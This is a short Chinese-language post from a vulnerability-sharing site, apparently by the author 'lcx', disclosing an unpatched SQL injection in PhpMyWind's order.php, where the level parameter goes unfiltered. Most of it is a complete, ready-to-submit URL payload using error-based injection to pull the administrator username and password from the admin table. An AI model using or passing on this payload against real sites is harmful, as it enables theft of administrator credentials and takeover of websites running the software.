漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

PhpMyWind SQL Injection 的另一个0day

order.php第39行

$sql = “SELECT * FROM `#@__cascadedata` WHERE level=$level And “;$level没有过滤

直接提交
[php]
http://xxx.com/phpmywind/order.php?action=getarea&level=1%20%20or%20@`\’`=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),0x7e,(substring((Select%20concat(username,0x7e,password)%20from%20`%23@__admin`),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`\’`=0%23[/php]

作者:lcx

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » PhpMyWind SQL Injection 的另一个0day

评论